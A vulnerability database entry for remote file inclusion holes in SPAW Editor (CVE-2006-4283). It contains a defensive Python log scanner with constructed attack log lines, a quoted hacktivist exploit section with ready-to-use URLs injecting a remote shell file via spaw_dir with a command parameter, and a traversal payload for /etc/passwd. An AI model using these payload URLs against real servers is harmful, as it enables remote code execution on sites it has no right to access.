SPAW PHP Editor multiple PHP remote file inclusion vulnerabilities

Vulnerability ID 1193755 Vulnerability type Input validation
Published 2006-08-22 Updated 2006-08-26
CVE number CVE-2006-4283 CNNVD-ID CNNVD-200608-364
Vulnerability platform N/A CVSS score 7.5
|Vulnerability sources
https://cxsecurity.com/issue/WLB-2006080141
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-364
|Vulnerability details
Multiple PHP remote file inclusion vulnerabilities exist in Solmetra SPAW Editor 1.0.6 and 1.0.7. A remote attacker can execute arbitrary PHP code via a URL in the spaw_dir parameter of the dialogs/ scripts: (1) a.php, (2) collorpicker.php, (3) img.php, (4) img_library.php, (5) table.php, or (6) td.php.
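Added example (not from the advisory or the SPAW project): a Python checker that runs the detection a defender would apply to web-server access logs for this class of bug, flagging any query parameter whose decoded value is a remote stream URL (the spaw_dir=http://... form described above) or a traversal string. The log lines, IP addresses and host names are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Common Log Format); not real traffic.
# Line 2 mirrors the advisory's URL shape: spaw_dir pointing at a remote file.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Aug/2006:10:01:02 +0000] "GET /spaw/dialogs/colorpicker.php?theme=default&lang=en HTTP/1.1" 200 812
10.0.0.9 - - [22/Aug/2006:10:03:41 +0000] "GET /spaw/dialogs/img.php?spaw_dir=http%3A%2F%2Fevil.example%2Fshell.txt%3F&cmd=id HTTP/1.1" 200 1404
10.0.0.9 - - [22/Aug/2006:10:03:59 +0000] "GET /spaw/dialogs/td.php?spaw_dir=../../../../etc/passwd%00 HTTP/1.1" 200 0
10.0.0.7 - - [22/Aug/2006:10:05:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Stream wrappers PHP's include() will fetch when allow_url_include/allow_url_fopen permit it.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftps?|php|data|expect)://', re.IGNORECASE)


def analyse_request(target):
    """Return (param, decoded_value, reason) for each suspicious query parameter."""
    findings = []
    # parse_qsl percent-decodes values, so http%3A%2F%2F is seen as http://
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if REMOTE_SCHEME_RE.match(value):
            findings.append((name, value, "remote file inclusion attempt"))
        elif "../" in value or "\x00" in value:
            findings.append((name, value, "local file inclusion / traversal attempt"))
    return findings


def scan_log(text):
    """Return one alert dict per suspicious parameter found in the log text."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        for name, value, reason in analyse_request(m["target"]):
            alerts.append({
                "ip": m["ip"], "time": m["ts"], "path": urlsplit(m["target"]).path,
                "param": name, "value": value, "reason": reason, "status": int(m["status"]),
            })
    return alerts
```

Log-based detection only sees what the server logs (GET query strings here, not POST bodies), so the same rejection of scheme-prefixed and traversal values belongs in the application before any variable reaches include().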
|Vulnerability EXP
* Kurdish Security Advisory
* Spaw Editor Remote Include Vulnerability
* Our Party is PKK, Our Army HPG, We will Earn
* contact ? : irc.gigachat.net #kurdhack & botan (at) linuxmail (dot) org [email concealed]
* Risk : High
* Class : Remote
* Script : Spaw Editor
* Version : v1.6 and v1.7
* Site :  www.solmetra.com

<?
// include wysiwyg config
include '../config/spaw_control.config.php';
include $spaw_root.'class/lang.class.php';
// the theme name comes straight from the query string and is used unvalidated in a path
$theme = empty($HTTP_GET_VARS['theme']) ? $spaw_default_theme : $HTTP_GET_VARS['theme'];
// $spaw_dir (the parameter named in this advisory) is prepended to the theme path
$theme_path = $spaw_dir.'lib/themes/'.$theme.'/';
$l = new SPAW_Lang($HTTP_GET_VARS['lang']);
$l->setBlock('colorpicker');
?>

http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=http://www.shell.txt&cmd=id
http://site.com/[path]/dialogs/img.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/img_library.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/table.php?spaw_dir=http://www.shell.txt?&cmd=id
http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?&cmd=id

Special MSG! : The Turk state is the aggressor behavior Don't stay quiet. Hear the Kurdish people is scream be late.. Stop the Turkey Military!
|References

Source: BID
Name: 19603
Link: http://www.securityfocus.com/bid/19603
Source: BUGTRAQ
Name: 20060819 [KurdishSecurity #23] Spaw Editor Remote Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/443752/100/0/threaded
Source: XF
Name: spaweditor-spawdir-file-include(28466)
Link: http://xforce.iss.net/xforce/xfdb/28466
Source: SREASON
Name: 1432
Link: http://securityreason.com/securityalert/1432